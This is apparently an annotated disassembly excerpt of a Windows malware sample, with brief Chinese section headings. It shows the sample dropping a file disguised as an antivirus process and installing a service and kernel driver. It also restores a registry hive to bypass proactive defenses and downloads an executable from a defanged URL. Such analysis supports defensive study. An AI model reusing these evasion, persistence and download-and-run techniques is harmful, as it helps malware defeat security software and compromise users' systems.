系统文件
00401574 |. 68 70844000 push 00408470 ; UNICODE """C:\WINDOWS\system32\Navapw32.exe"""
00401579 |. 68 00854000 push 00408500 ; ASCII "Navapw.exe"
服务
00401694 |. C705 0C974000>mov dword ptr [40970C], 00408648 ; ASCII "SYSTEM\CurrentControlSet\Services\{FFF87A11-32E3-87FF-321A-679B25EA887C}"
0040169E |. E8 6D020000 call 00401910
004016A3 |. 83C4 08 add esp, 8
004016A6 |. 85C0 test eax, eax
004016A8 |. 0F85 F2000000 jnz 004017A0
004016AE |. 68 B8844000 push 004084B8 ; ASCII "Dump registry hive SUCCESS!",LF
004016B3 |. E8 E5190000 call 0040309D
004016B8 |. 6A 01 push 1
004016BA |. 68 F0F0F0F0 push F0F0F0F0
004016BF |. 68 34864000 push 00408634 ; UNICODE "ksymc.sys"
004016C4 |. 68 28864000 push 00408628 ; ASCII "DisplayName"
驱动
00401733 |. 68 C4854000 push 004085C4 ; UNICODE "\??\C:\WINDOWS\system32\drivers\ksymc.sys"
00401738 |. 68 B0854000 push 004085B0 ; ASCII "Start"
用两个hiv文件过主动
00401D23 |. 68 C8884000 push 004088C8 ; ASCII "Restore HKEY_LOCAL_MACHINE hive SUCCESS!",LF
00401D28 |. E8 70130000 call 0040309D
00401D2D |. 83C4 04 add esp, 4
00401D30 |. 68 DC834000 push 004083DC ; ASCII ".\temp.hiv"
00401D35 |. FFD3 call ebx
00401D37 |. BF 04884000 mov edi, 00408804 ; ASCII ".\HKLM_WinNT.hiv"
00401D3C |. 83C9 FF or ecx, FFFFFFFF
00401D3F |. 33C0 xor eax, eax
00401D41 |. 68 EC834000 push 004083EC ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Windows"
下载一个自解压文件
00401153 |. 68 74804000 push 00408074 ; UNICODE "hxxp://www.winampcn.com/download/wrar37b7sc.exe"